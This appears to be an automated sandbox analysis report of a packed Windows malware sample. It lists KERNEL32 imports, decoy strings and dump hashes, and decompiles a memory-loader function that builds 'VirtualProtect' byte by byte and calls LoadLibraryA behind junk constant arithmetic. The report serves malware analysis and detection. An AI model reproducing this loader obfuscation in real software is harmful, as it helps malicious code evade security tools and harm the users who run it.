MoveFileExA.KERNEL32(jeg,yufikupamubukizunubijisalomusukafawenuveticimoc,00000000), ref: 0041CD12
LockFileEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041CD1E
ReplaceFileA.KERNEL32 ref: 0041CD32
lstrcpyA.KERNEL32(?,Vidizotina tufurig warixolefulig), ref: 0041CD45
SetFileShortNameA.KERNEL32(00000000,00000000), ref: 0041CD4D
GetThreadLocale.KERNEL32 ref: 0041CD76
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041CD9C
CreateSemaphoreA.KERNEL32 ref: 0041CDC3
SetLocalTime.KERNEL32(00000000), ref: 0041CDC6
FindResourceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CDD0
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,00000000), ref: 0041CDE7
CreateSemaphoreA.KERNEL32 ref: 0041CDF1
GetNumberFormatW.KERNEL32 ref: 0041CE00
PeekConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 0041CE12
CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CE1C
GetProcAddress.KERNEL32(00000000,00000000), ref: 0041CE24
HeapUnlock.KERNEL32(00000000), ref: 0041CE2B
GetFileAttributesExW.KERNEL32(Hanowopede,00000000,?), ref: 0041CE3F
GetPrivateProfileStructW.KERNEL32 ref: 0041CE51
TryEnterCriticalSection.KERNEL32(?), ref: 0041CE5C
GetPrivateProfileStructA.KERNEL32 ref: 0041CE6A
WritePrivateProfileSectionW.KERNEL32 ref: 0041CE73
GetPrivateProfileSectionW.KERNEL32 ref: 0041CE7D
SetSystemTimeAdjustment.KERNEL32 ref: 0041CE85
InterlockedIncrement.KERNEL32(?), ref: 0041CEBE
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041CEFD
EndUpdateResourceA.KERNEL32 ref: 0041CF05
DefineDosDeviceW.KERNEL32(00000000,00000000,00000000), ref: 0041CF0E
TryEnterCriticalSection.KERNEL32(?), ref: 0041CF19
InterlockedExchange.KERNEL32(?,00000000), ref: 0041CF21
SetFirmwareEnvironmentVariableA.KERNEL32(Gexu wegunisozegojab jadiwopunuj xoludefowojadur lucaza,Zajin guligoy zutik,00000000,00000000), ref: 0041CF33
CreateActCtxA.KERNEL32 ref: 0041CF3E
lstrcatW.KERNEL32(?,00000000), ref: 0041CF4D
WriteProfileStringA.KERNEL32(Noheraxopetat jokowugalew xahosuxahexo xofihumozu cifan,Zel coyicuzemawurip cuyuluda,Leyajiziredat sovoxatuyuk), ref: 0041CF62
TerminateThread.KERNEL32(00000000,00000000), ref: 0041CF6A
GetSystemWow64DirectoryA.KERNEL32(?,00000000), ref: 0041CF79
GetConsoleMode.KERNEL32(?,00000000), ref: 0041CF85
WriteFile.KERNEL32(00000000,?,00000000,?,?), ref: 0041CFAD
lstrcmpA.KERNEL32(Hocukuwamoyaso wabig,Rusipoca hutujijini bivopi fopuhatuve wadag), ref: 0041CFBD
FindFirstFileA.KERNEL32(Cen lumagocatulesak,?), ref: 0041CFD0
DebugBreak.KERNEL32 ref: 0041CFD6
GetStringTypeA.KERNEL32(00000000,00000000,Reyahivi cekojer koxudarinajih jadage,00000000,?), ref: 0041CFE9

Strings

Cen lumagocatulesak, xrefs: 0041CFCB
yufikupamubukizunubijisalomusukafawenuveticimoc, xrefs: 0041CD08
Hanowopede, xrefs: 0041CE3A
Rusipoca hutujijini bivopi fopuhatuve wadag, xrefs: 0041CFB3
jeg, xrefs: 0041CD0D
Gexu wegunisozegojab jadiwopunuj xoludefowojadur lucaza, xrefs: 0041CF2E
semexubiwuhanivim, xrefs: 0041CA8B
Sugoficalaluj tupemicoba, xrefs: 0041CAA6
xogoruleyowukimutoxul, xrefs: 0041CD2D
Hocukuwamoyaso wabig, xrefs: 0041CFB8
X<, xrefs: 0041CD9E
rozovejusec, xrefs: 0041CD28
hupezigisilegurazemalugisif, xrefs: 0041CB74
buvamis, xrefs: 0041CC05
Kib revomuvufibo miyif yufobeh, xrefs: 0041CAA1
Hukim defufidum dabopay ziracenuweg, xrefs: 0041CCD5
Tibo ruyelayoyadi kowaxi joca nag, xrefs: 0041CCDA
Ragotetu capuhagita wiweyufubub, xrefs: 0041CC57
Zumohodove linucasuxadefi dunixoxehevavo, xrefs: 0041CADC
Nixiyebepicus yahidomawer zepuzetivum, xrefs: 0041CCDF
Noheraxopetat jokowugalew xahosuxahexo xofihumozu cifan, xrefs: 0041CF5D
Zel coyicuzemawurip cuyuluda, xrefs: 0041CF58
Vidizotina tufurig warixolefulig, xrefs: 0041CD38
Tog bemal zumesuyamop zemim xuzaxarurolu, xrefs: 0041CAAB
Zajin guligoy zutik, xrefs: 0041CF29
Reyahivi cekojer koxudarinajih jadage, xrefs: 0041CFE2
Leyajiziredat sovoxatuyuk, xrefs: 0041CF53
\H, xrefs: 0041CD54

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleFile$Write$Profile$SectionSystemTimer$CreateNamePrivate$CriticalEnterEnvironmentErrorFindFreeInputLastMutexOpenPathSemaphoreStateStringTime$AdjustmentBreakBufferCommCompletionDeleteDeviceDirectoryH_prologHeapInterlockedLengthLocalLockMovePowerProcessQueueResourceStatusStringsStructThreadUnlockVolumeWait__dosmaperr$AddressAliasAliasesAllocAtomAttributesChangeCharacterClearCompressedComputerCurrentDebugDefineEnumExchangeExesExitFatalFillFirmwareFirstFlushFormatFullGlobalHandleIncrementInfoLocaleLocalesModeMountMultipleMutex::_NamedNextNumberObjectObjectsOutputPeekPipePointPortProcQueuedReplaceScreenSearchSessionShortShrinkSignalSizeTerminateTimesTypeUpdateValidateVariableVirtualWaitableWatchWow64__wremove__wrenamelstrcatlstrcmplstrcpylstrcpynstd::_std::locale::locale
String ID: Cen lumagocatulesak$Gexu wegunisozegojab jadiwopunuj xoludefowojadur lucaza$Hanowopede$Hocukuwamoyaso wabig$Hukim defufidum dabopay ziracenuweg$Kib revomuvufibo miyif yufobeh$Leyajiziredat sovoxatuyuk$Nixiyebepicus yahidomawer zepuzetivum$Noheraxopetat jokowugalew xahosuxahexo xofihumozu cifan$Ragotetu capuhagita wiweyufubub$Reyahivi cekojer koxudarinajih jadage$Rusipoca hutujijini bivopi fopuhatuve wadag$Sugoficalaluj tupemicoba$Tibo ruyelayoyadi kowaxi joca nag$Tog bemal zumesuyamop zemim xuzaxarurolu$Vidizotina tufurig warixolefulig$X<$Zajin guligoy zutik$Zel coyicuzemawurip cuyuluda$Zumohodove linucasuxadefi dunixoxehevavo$buvamis$hupezigisilegurazemalugisif$jeg$rozovejusec$semexubiwuhanivim$xogoruleyowukimutoxul$yufikupamubukizunubijisalomusukafawenuveticimoc$\H
API String ID: 2662908145-1980437027
Opcode ID: 971baad0c205f63907a5749d2772beb22080216a9abc21aa815e9ae5ae84ea9a
Instruction ID: ad5d7874c2311d26bc8bb10f585e28767c789c88556409235226b36df01caf23
Opcode Fuzzy Hash: 971baad0c205f63907a5749d2772beb22080216a9abc21aa815e9ae5ae84ea9a
Instruction Fuzzy Hash: DBE1FC72442664BBC3259BA1EE4CDDF3EACEF4A391B004436F24AA5070D7784645CBBE

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABC0, Relevance: 65.5, APIs: 3, Strings: 34, Instructions: 785
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ABC0() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				long _v1324;
				int _t1483;
				CHAR* _t1565;

				"VirtualProtect" = 0x656b;
				"rtualProtect" = 0x72;
				"rotect" = 0x642e;
				 *0x448a52 = 0x6c;
				 *0x448a54 = 0;
				_v16 = 0x1585ce53;
				_v4 = 0x7742fe0f;
				_v1064 = 0x4646dd23;
				_v972 = 0x4075d87c;
				_v492 = 0x6d9becc;
				_v488 = 0x1c0df3a3;
				_v500 = 0x5090e978;
				_v628 = 0x556bf28e;
				_v976 = 0x54346b85;
				_v636 = 0x159a4af1;
				_v536 = 0x107b2ee1;
				_v1072 = 0x730da54;
				_v272 = 0x7750180e;
				_v644 = 0x1dca0fad;
				_v980 = 0x65544fff;
				_v372 = 0x7865ece;
				_v988 = 0x336cc1cc;
				_v112 = 0x6610b8e5;
				_v88 = 0x1250dbbb;
				_v508 = 0x31dca6e7;
				_v380 = 0x1a84784d;
				_v1172 = 0x4725625;
				_v680 = 0x5677b39e;
				_v1080 = 0x335dfc3b;
				_v296 = 0x23078573;
				_v388 = 0x14a24d41;
				_v788 = 0xe0e054e;
				_v996 = 0x4bb83cff;
				_v1176 = 0x7869c878;
				_v872 = 0xe933fff;
				_v776 = 0x61161b51;
				_v344 = 0x57e61415;
				_v544 = 0x470a664a;
				_v116 = 0x3ba820f;
				_v1088 = 0x2978adc8;
				_v592 = 0x7fb643c2;
				_v440 = 0x75295aa;
				_v880 = 0x77d02147;
				_v72 = 0x574a30b2;
				_v1004 = 0x668af624;
				_v12 = 0x30e3ce32;
				_v1012 = 0x4a3cbeee;
				_v20 = 0x5d106558;
				_v224 = 0x1a063a0d;
				_v1020 = 0x5553d04;
				_v888 = 0x7edd5ec;
				_v1184 = 0x728f35af;
				_v1248 = 0x4d08ddab;
				_v1180 = 0x3b63b427;
				_v124 = 0x53abb7ad;
				_v796 = 0x27d42422;
				_v132 = 0xa65aaa;
				_v1188 = 0x3a1d2c3;
				_v448 = 0x2a642b16;
				_v236 = 0x140d4cb4;
				_v392 = 0x7c396e8f;
				_v152 = 0x934595;
				_v160 = 0x772fbd56;
				_v688 = 0x9751132;
				_v1096 = 0x35ca885;
				_v652 = 0x300e9155;
				_v804 = 0x2b463d14;
				_v1256 = 0x7505d71b;
				_v516 = 0x6658a43c;
				_v176 = 0x740f1800;
				_v896 = 0x56156c98;
				_v248 = 0x7f96a288;
				_v32 = 0x58a4634a;
				_v1192 = 0x6e6f4f6b;
				_v1196 = 0x6f434b53;
				_v524 = 0x2af62163;
				_v1204 = 0x33028018;
				_v532 = 0x282fdd99;
				_v984 = 0xafde6e7;
				_v496 = 0x2e33a8db;
				_v904 = 0x4d329c9e;
				_v660 = 0x1a432b2f;
				_v244 = 0x43562b4;
				_v552 = 0x5ddceb83;
				_v812 = 0x575ef1bd;
				_v1104 = 0x46359574;
				_v396 = 0x5ea2a415;
				_v280 = 0x2de551f5;
				_v820 = 0x342617f;
				_v784 = 0x364234cd;
				_v696 = 0x563903a9;
				_v828 = 0x1c533d31;
				_v540 = 0x4c6be049;
				_v140 = 0x5563d541;
				_v252 = 0x4c3a3a28;
				_v200 = 0x68b93b4b;
				_v260 = 0x147b53ce;
				_v1212 = 0x6f5b452a;
				_v1220 = 0x58148cae;
				_v632 = 0x2a2e14b8;
				_v1228 = 0x7090eaed;
				_v1264 = 0x62ac1593;
				_v992 = 0x10cee8b9;
				_v548 = 0x7146715b;
				_v600 = 0x22b15c89;
				_v1028 = 0x3bd13129;
				_v352 = 0x5ff0dd5;
				_v128 = 0x4fc1e4e3;
				_v404 = 0x31747353;
				_v668 = 0x23bf818a;
				_v456 = 0x2a57c7b0;
				_v556 = 0xef03a7b;
				_v792 = 0x2ae22cfe;
				_v1000 = 0x12c2656f;
				_v1200 = 0x4c13e413;
				_v504 = 0x7e156dcd;
				_v836 = 0x248bfbfd;
				_v304 = 0x28e17edd;
				_v676 = 0x50533070;
				_v268 = 0x70061e26;
				_v684 = 0x6c8be159;
				_v1208 = 0x4949d7bf;
				_v564 = 0x4e4ff665;
				_v704 = 0x60785b46;
				_v48 = 0x7ff2ca0c;
				_v148 = 0x27a3ff31;
				_v1236 = 0x52067d32;
				_v156 = 0x66175292;
				_v692 = 0x630a2fca;
				_v1112 = 0x44338521;
				_v572 = 0x5f887805;
				_v1008 = 0x7bd0472e;
				_v400 = 0x16126506;
				_v28 = 0x78bffa56;
				_v36 = 0x2b727c00;
				_v276 = 0x6b53afec;
				_v560 = 0x78f2f396;
				_v912 = 0x30760576;
				_v232 = 0x191e3c25;
				_v712 = 0x22b3c5e1;
				_v1036 = 0x632708b2;
				_v320 = 0x65017f11;
				_v608 = 0x682b6faf;
				_v1216 = 0x1bd23bba;
				_v412 = 0x546a0f04;
				_v1244 = 0x55363a3d;
				_v844 = 0x227a254e;
				_v1120 = 0x59fbd285;
				_v1252 = 0x7f286637;
				_v800 = 0x15a59d5a;
				_v852 = 0x3fd092b0;
				_v1272 = 0x3502da08;
				_v640 = 0x1d62073e;
				_v1280 = 0x21400457;
				_v104 = 0xc85666a;
				_v24 = 0x7de4f95b;
				_v284 = 0x612f7709;
				_v144 = 0x3b484bf7;
				_v580 = 0x64011f8b;
				_v1044 = 0x2ad6448c;
				_v588 = 0xac616b9;
				_v292 = 0x30511d1c;
				_v860 = 0x451593ab;
				_v868 = 0x44d42f3a;
				_v360 = 0x5e89b2de;
				_v596 = 0x6a3f6bcc;
				_v1052 = 0x3c3ee72f;
				_v80 = 0x7975c2ea;
				_v1064 = _v1064 - 0x16ee091;
				_v16 = _v16 + 0x12700187;
				_v16 = _v16 + 0x1bb610e6;
				_v536 = _v536 - 0x8fd9208;
				_v1072 = _v1072 + 0xbedf0a5;
				_v636 = _v636 - 0x6e809e91;
				_v976 = _v976 + 0x6e64a50e;
				_v372 = _v372 + 0x3b9ccc7b;
				_v372 = _v372 - 0x4231abf7;
				_v112 = _v112 + 0x35c49474;
				_v272 = _v272 + 0x7358ad63;
				_v636 = _v636 - 0x568014b;
				_v112 = _v112 - 0x67e9d21d;
				_v644 = _v644 - 0x66a98904;
				_v1072 = _v1072 - 0x5b2ec9eb;
				_v508 = _v508 - 0x2987f7d1;
				_v1072 = _v1072 + 0x49a708b1;
				_v976 = _v976 + 0x31afc7b9;
				_v680 = _v680 + 0x3c7541c7;
				_v636 = _v636 + 0x1e9ddbdd;
				_v1064 = _v1064 + 0x711bd0c6;
				_v112 = _v112 - 0x34c4eb94;
				_v628 = _v628 - 0x347b7918;
				_v16 = _v16 + 0x2a6b6112;
				_v508 = _v508 + 0x4e512685;
				_v508 = _v508 + 0x3a70c750;
				_v628 = _v628 + 0x74c9e0b3;
				_v872 = _v872 - 0x61ae872d;
				_v500 = _v500 - 0x4d180cbf;
				_v996 = _v996 + 0x57da2287;
				_v500 = _v500 + 0x523c7331;
				_v1080 = _v1080 - 0x6744c002;
				_v544 = _v544 - 0x25f8e47c;
				_v116 = _v116 + 0x7c40cae6;
				_v536 = _v536 + 0x1f41ad63;
				_v628 = _v628 + 0x7869392a;
				_v112 = _v112 - 0x4ff64046;
				_v644 = _v644 + 0x6e3b85ae;
				_v112 = _v112 + 0x73ff4a6a;
				_v636 = _v636 + 0x27966a09;
				_v380 = _v380 - 0x1bf36ae4;
				_v680 = _v680 + 0x22b3bec7;
				_v4 = _v4 + 0x1355a4ce;
				_t1565 = "VirtualProtect";
				 *0x448a53 = 0x6c;
				M00448A4B = 0x336c656e;
				M00448A4F = 0x32;
				 *0x4c449c = LoadLibraryA(_t1565);
				 *0x448a56 = 0;
				"VirtualProtect" = 0x60;
				M00448A4F = 0x7c50;
				 *0x448a51 = 0x6f;
				_v300 = 0x62156fcf;
				_v876 = 0x502efe41;
				_v808 = 0x609e2643;
				_v256 = 0x4ba8cdfd;
				_v700 = 0x31845251;
				_v884 = 0x2b30016c;
				_v892 = 0x445f247f;
				_v900 = 0x2a94b4db;
				_v1128 = 0x23db2fa5;
				_v164 = 0x1fbb849b;
				_v408 = 0x16bd29db;
				_v44 = 0x595575f2;
				_v172 = 0x6f1bb8e1;
				_v1224 = 0x269896f0;
				_v708 = 0xcccbae9;
				_v920 = 0x25a29da8;
				_v720 = 0x5f3b686c;
				_v420 = 0x7c387844;
				_v308 = 0x10fcfd77;
				_v428 = 0x4694beab;
				_v436 = 0x765743e4;
				_v616 = 0x6f99707f;
				_v908 = 0x4811a4fa;
				_v816 = 0x5f22c85a;
				_v1060 = 0x82b56de;
				_v52 = 0xbbd18c6;
				_v716 = 0x73a24d05;
				_v916 = 0x11623f48;
				_v184 = 0x4c57667f;
				_v1068 = 0x282c5746;
				_v180 = 0x30fe6ac9;
				_v724 = 0x79945b7d;
				_v208 = 0x1b1bb00b;
				_v728 = 0x5e269457;
				_v464 = 0x7403513c;
				_v1016 = 0x3ac8f01a;
				_v568 = 0x2d3321bb;
				_v1136 = 0x3ed133ce;
				_v512 = 0x5e6ad078;
				_v288 = 0x6feb39ed;
				_v928 = 0xf117ad6;
				_v316 = 0x626eda47;
				_v1144 = 0x504a79b0;
				_v824 = 0x3166893;
				_v1288 = 0x1ddbab35;
				_v416 = 0x3bed98dd;
				_v732 = 0x753bfc8;
				_v740 = 0x77c78e41;
				_v1076 = 0x68c1245b;
				_v648 = 0x751a65cd;
				_v368 = 0x6fb94ac3;
				_v924 = 0x7aea0ef8;
				_v832 = 0x222cd063;
				_v444 = 0x526eab65;
				_v452 = 0x25f4b99c;
				_v324 = 0x662707bd;
				_v120 = 0x3024670a;
				_v936 = 0x16c237fd;
				_v1296 = 0x55b890a5;
				_v932 = 0x47cbfcef;
				_v332 = 0x105dd22;
				_v576 = 0x7afbcb07;
				_v56 = 0x59cab29e;
				_v1260 = 0x6c9fa00d;
				_v1024 = 0x13e9f8c8;
				_v188 = 0x4009d632;
				_v1268 = 0x137f66ac;
				_v1084 = 0x6038b951;
				_v472 = 0x176b4475;
				_v1276 = 0x2ab32bdd;
				_v1152 = 0x515db017;
				_v604 = 0x7302b5aa;
				_v8 = 0x5bc1104d;
				_v840 = 0x48e9ae43;
				_v340 = 0x26829ca;
				_v60 = 0x5c5917a4;
				_v196 = 0x3fd49075;
				_v944 = 0xcb629d1;
				_v1032 = 0x3dd3cf7a;
				_v240 = 0x2786931;
				_v424 = 0x210e6e87;
				_v848 = 0x3917711d;
				_v748 = 0x76928844;
				_v736 = 0x2d60e8f;
				_v348 = 0x36d4c0ea;
				_v1092 = 0x49151829;
				_v520 = 0xf0e6c12;
				_v952 = 0xef0017b;
				_v1100 = 0x2af06a43;
				_v68 = 0x7374b303;
				_v1040 = 0x5bc4a701;
				_v1284 = 0x49139c63;
				_v460 = 0x74cb6ce2;
				_v40 = 0x5ded0cc0;
				_v328 = 0x5dcd5be2;
				_v1108 = 0x64031bd0;
				_v1292 = 0x2d276eb8;
				_v756 = 0x2c59c4d0;
				_v76 = 0x4f20af0e;
				_v96 = 0x365c19ac;
				_v216 = 0x7f535e31;
				_v940 = 0xdedcc97;
				_v356 = 0x7e0a7ced;
				_v1116 = 0x687fa226;
				_v612 = 0x46f40653;
				_v84 = 0x317ebda5;
				_v92 = 0x56e7500d;
				_v480 = 0x6b33b020;
				_v1300 = 0x366f6df3;
				_v1232 = 0x32beea86;
				_v1308 = 0x228d1197;
				_v1316 = 0x7693296c;
				_v744 = 0x3b04cb38;
				_v468 = 0x4c011a5c;
				_v264 = 0x244a45b6;
				_v948 = 0x48ea128;
				_v204 = 0x261e5791;
				_v1048 = 0x527c0faa;
				_v1320 = 0x164ede6a;
				_v1160 = 0xeff6b27;
				_v956 = 0x8200a32;
				_v376 = 0x24b90350;
				_v1304 = 0x32627711;
				_v312 = 0x60c84633;
				_v100 = 0x2efddde7;
				_v752 = 0x43df52f7;
				_v960 = 0xf7a1ec1;
				_v212 = 0x6d86c563;
				_v192 = 0x66efffe0;
				_v764 = 0x45a58dc6;
				_v1124 = 0x26c95977;
				_v528 = 0x5eea2f6b;
				_v620 = 0x366e5d79;
				_v664 = 0xd97024e;
				_v760 = 0x219e4665;
				_v584 = 0x5769e212;
				_v1056 = 0x7f468728;
				_v1132 = 0x34b8882e;
				_v856 = 0x37afd529;
				_v1140 = 0x60dcc09d;
				_v1148 = 0x1ca13abd;
				_v108 = 0x6d9a90fb;
				_v64 = 0x3574052d;
				_v220 = 0x1586a809;
				_v432 = 0x4efa0c39;
				_v656 = 0x5687f46f;
				_v336 = 0x618934ef;
				_v864 = 0x68873377;
				_v1312 = 0x7404d5d1;
				_v772 = 0x57a121ab;
				_v364 = 0x17aa24c0;
				_v384 = 0x25cb89cb;
				_v476 = 0x531bc81b;
				_v168 = 0x639cc778;
				_v136 = 0x205d653e;
				_v780 = 0x4e48f17c;
				_v672 = 0x5e0f6ffa;
				_v964 = 0x4393df35;
				_v484 = 0x40f13569;
				_v968 = 0x210b0adf;
				_v1156 = 0x69c97e0e;
				_v1240 = 0x7d8d0db1;
				_v1168 = 0x3c11c155;
				_v1164 = 0x775f088f;
				_v228 = 0x106c3386;
				_v624 = 0x687a8d1a;
				_v768 = 0x7f0b5f93;
				_v256 = _v256 - 0x185b168d;
				_v256 = _v256 - 0x6c912c6c;
				_v876 = _v876 - 0x17f7c305;
				_v300 = _v300 - 0x67e2e549;
				_v408 = _v408 - 0x2bf52b48;
				_v164 = _v164 - 0x16e1b59f;
				_v164 = _v164 - 0x3942d78e;
				_v900 = _v900 - 0x3c31dc6d;
				_v408 = _v408 - 0x206fcf0;
				_v256 = _v256 + 0x462a15c5;
				_v256 = _v256 - 0x7fa0dc60;
				_v700 = _v700 + 0x12aa4ad1;
				_v300 = _v300 + 0x62157c4d;
				_v256 = _v256 - 0x35591a9c;
				_v808 = _v808 - 0x75a28f2;
				_v900 = _v900 + 0x52aee917;
				_v300 = _v300 - 0x243787a8;
				_v172 = _v172 - 0x4b1a50d9;
				_v892 = _v892 - 0x62c5a066;
				_v808 = _v808 - 0x28e9e75b;
